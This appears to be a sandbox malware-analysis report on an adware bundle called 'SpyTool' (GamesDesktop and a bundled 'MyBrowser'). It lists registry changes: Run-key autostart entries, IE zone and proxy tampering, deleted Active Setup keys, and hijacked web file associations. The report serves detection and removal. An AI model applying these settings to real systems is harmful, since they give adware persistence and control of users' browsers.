[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

To automatically run itself each time Windows is booted, the SpyTool adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"upgmsd_re_005010096.exe" = "%Documents and Settings%\%current user%\Local Settings\Application Data\gmsd_re_005010096\upgmsd_re_005010096.exe -runhelper"

The SpyTool deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process nsf2B.tmp:1664 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKCU\Software\Tutorials\updv]
"Version" = "15.09.24"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Programs" = "%Documents and Settings%\%current user%\Start Menu\Programs"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"HelpLink" = "http://re.gamesdesktop.com"
"Inno Setup: User" = "%CurrentUserName%"
"QuietUninstallString" = "%Program Files%\gmsd_re_005010096\unins000.exe /SILENT"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"Inno Setup: App Path" = "%Program Files%\gmsd_re_005010096"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"UninstallString" = "%Program Files%\gmsd_re_005010096\unins000.exe"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"InstallDate" = "20150926"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"NoRepair" = "1"
"InstallLocation" = "%Program Files%\gmsd_re_005010096\"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"My Pictures" = "%Documents and Settings%\%current user%\My Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"URLInfoAbout" = "http://re.gamesdesktop.com"

[HKCU\Software\TutoTag]
"OnceInstalled" = "re"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"Publisher" = "GAMESDESKTOP"

[HKCU\Software\Tutorials\updatetutorialshp]
"MainDir" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonVideo" = "%Documents and Settings%\All Users\Documents\My Videos"

[HKCU\Software\Microsoft]
"Tinstalls" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonMusic" = "%Documents and Settings%\All Users\Documents\My Music"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"Inno Setup: Language" = "re"
"DisplayName" = "GamesDesktop 092.005010096"

[HKCU\Software\Microsoft\Tinstalls]
"20150926" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"Inno Setup: Icon Group" = "GAMESDESKTOP"

[HKLM\SOFTWARE\GAMESDESKTOP\gmsd_re_005010096]
"PathInstall" = "%Program Files%\gmsd_re_005010096"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"URLUpdateInfo" = "http://re.gamesdesktop.com"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"CommonPictures" = "%Documents and Settings%\All Users\Documents\My Pictures"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E4 9B E8 E5 13 2D AC 35 DC 20 79 FF C2 7D C7 56"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Programs" = "%Documents and Settings%\All Users\Start Menu\Programs"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\gmsd_re_005010096_is1]
"NoModify" = "1"
"Inno Setup: Setup Version" = "5.5.6 (a)"

[HKCU\Software\TutoTag]
"AgenceInstalledYet" = "true"
"OnceInstalled2" = "re"

To automatically run itself each time Windows is booted, the SpyTool adds the following link to its file to the system registry autorun key:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"gmsd_re_005010096" = "%Program Files%\gmsd_re_005010096\gmsd_re_005010096.exe"

The SpyTool deletes the following registry key(s):

[HKCU\Software\Microsoft\Active Setup\Installed Components\{22d6f312-b0f6-11d0-94ab-0080c74c7e95}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\>{881dd1c5-3dcf-431b-b061-f3f88e8be88a}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{2179C5D3-EBFF-11CF-B6FD-00AA00B4E220}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4383}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{5945c046-1e7d-11d1-bc44-00c04fd912be}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{44BBA840-CC51-11CF-AAFA-00AA00B6015C}]
[HKCU\Software\Microsoft\Active Setup]
[HKCU\Software\Microsoft\Active Setup\Installed Components\>{60B49E34-C7CC-11D0-8953-00A0C90347FF}MICROS]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{44BBA848-CC51-11CF-AAFA-00AA00B6015C}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{89B4C1CD-B018-4511-B0A1-5476DBF70820}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{7790769C-0471-11d2-AF11-00C04FA35D02}]
[HKCU\Software\Microsoft\Active Setup\Installed Components]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{89820200-ECBD-11cf-8B85-00AA005B4340}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{2C7339CF-2B09-4501-B3F3-F3508C9228ED}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\>{26923b43-4d38-484f-9b9e-de460746276c}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{44BBA842-CC51-11CF-AAFA-00AA00B6015B}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{4b218e3e-bc98-4770-93d3-2731b9329278}]
[HKCU\Software\Microsoft\Active Setup\Installed Components\{6BF52A52-394A-11d3-B153-00C04F79FAA6}]

The process nsf2B.tmp:668 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "87 67 77 1D 69 55 15 F3 4F EB 74 3E 9B C6 A1 AB"

The process nswA.tmp:1336 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "88 25 AC E3 B3 8E D3 91 44 01 AF 24 C8 81 EA DD"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process gmsd_re_005010096.exe:592 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "97 9E D1 6F C3 38 D0 AA EF DC 44 FC D5 D6 BE 31"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
"Local AppData" = "%Documents and Settings%\%current user%\Local Settings\Application Data"

The process nsr19.tmp:204 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "63 9D C6 47 86 6D FD 8C 5E F7 81 B2 D5 78 01 56"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The SpyTool deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process nsdF.tmp:1060 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "79 0C 8A 19 3A 70 AF 02 72 88 8F 32 A4 56 22 7F"

[HKLM\SOFTWARE\Crossbrowse]
"Preinstall" = "1"

[HKCU\Software\Crossbrowse]
"Preinstall" = "1"

The process fsd34.exe:1692 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@xpsp3res.dll,-20001" = "Diagnose Connection Problems..."

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "CE 8D AA A4 34 80 73 81 87 53 A4 0B B8 84 02 18"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"LangID" = "09 04"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:

"IntranetName" = "1"

The SpyTool deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\MyBrowser\MyBrowser\Application]
"mybrowser.exe"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache]
"@shdoclc.dll,-880"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Perl\bin]
"perl.exe"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\is-KUMK3.tmp]
"nsf2B.tmp"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\@%System%]
"SHELL32.dll,-9227"
"SHELL32.dll,-8964"
"SHELL32.dll,-9319"
"SHELL32.dll,-9217"
"SHELL32.dll,-9216"

The process nsw42.tmp:660 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FD 69 E7 D4 C3 47 4E AA 92 96 CB FB DC 43 10 3C"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

The process nsx46.tmp:2724 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 23 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "4C B7 30 EF 41 21 51 2A A9 96 F2 AE 4C 48 31 01"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The SpyTool deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process setup.exe:1356 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\InstallInfo]
"IconsVisible" = "1"

[HKCU\Software\Classes\ftp\shell]
"(Default)" = "open"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"

[HKLM\SOFTWARE\MyBrowser\Installer]
"Name" = "MyBrowser"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Start Menu" = "%Documents and Settings%\All Users\Start Menu"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities]
"ApplicationDescription" = "MyBrowser is a web browser that runs webpages and applications with lightning speed. It's fast, stable, and easy to use. Browse the web more safely with malware and phishing protection built into MyBrowser."

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"smsto" = "CRSBRWSHTML"

[HKCR\https\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"DisplayIcon" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"

[HKLM\SOFTWARE\MyBrowser\Installer]
"UninstallArguments" = " --uninstall --system-level"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"VersionMinor" = "95"

[HKCR\.html\OpenWithProgids]
"CRSBRWSHTML" = ""

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"DisplayVersion" = "39.5.2171.95"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Start Menu" = "%Documents and Settings%\%current user%\Start Menu"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities]
"ApplicationName" = "MyBrowser"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"InstallDate" = "20150926"

[HKCU\Software\Classes\http\shell\open\ddeexec]
"(Default)" = ""

[HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components]
"StubPath" = "%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\chrmstp.exe --configure-user-settings --verbose-logging --system-level"

[HKCR\.html]
"(Default)" = "CRSBRWSHTML"

[HKCU\Software\Classes\ftp]
"URL Protocol" = ""

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"nntp" = "CRSBRWSHTML"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\FileAssociations]
".xhtml" = "CRSBRWSHTML"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"mailto" = "CRSBRWSHTML"

[HKCU\Software\Classes\.xht]
"(Default)" = "CRSBRWSHTML"

[HKCU\Software\Classes\ftp\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe -- %1"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Program Files%\MyBrowser\MyBrowser,"

[HKCU\Software\Classes\.html]
"(Default)" = "CRSBRWSHTML"

[HKCU\Software\Classes\ftp\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\MyBrowser]
"VersionMajor" = "2171"

[HKCU\Software\Classes\.shtml]
"(Default)" = "CRSBRWSHTML"

[HKCU\Software\Classes\https\shell\open\ddeexec]
"(Default)" = ""

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\shell\open\command]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe"

[HKCR\CLSID\{2A563926-CF4B-4363-A760-F71E46205B7E}\LocalServer32]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\39.5.2171.95\delegate_execute.exe"

[HKCR\CLSID\{2A563926-CF4B-4363-A760-F71E46205B7E}]
"(Default)" = "CommandExecuteImpl Class"

[HKLM\SOFTWARE\Clients\StartMenuInternet\MyBrowser\Capabilities\URLAssociations]
"irc" = "CRSBRWSHTML"

[HKCR\ftp\DefaultIcon]
"(Default)" = "%Program Files%\MyBrowser\MyBrowser\Application\mybrowser.exe,0"

